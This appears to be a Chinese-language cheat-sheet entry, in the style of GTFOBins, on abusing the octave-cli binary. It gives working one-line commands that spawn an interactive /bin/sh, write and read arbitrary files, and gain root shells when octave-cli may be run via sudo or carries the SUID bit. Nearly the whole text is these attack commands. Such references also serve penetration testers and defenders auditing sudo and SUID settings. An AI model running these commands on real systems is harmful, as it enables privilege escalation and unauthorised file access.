用来生成一个交互式的系统shell。
octave-cli --eval 'system("/bin/sh")'将数据写入文件中。
octave-cli --eval 'filename = "要写入的文件"; fid = fopen(filename, "w"); fputs(fid, "DATA"); fclose(fid);'从文件中读取数据。
octave-cli --eval 'format none; fid = fopen("要读取的文件路径"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
sudo octave-cli --eval 'system("/bin/sh")'suid是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。
./octave-cli --eval 'system("/bin/sh")'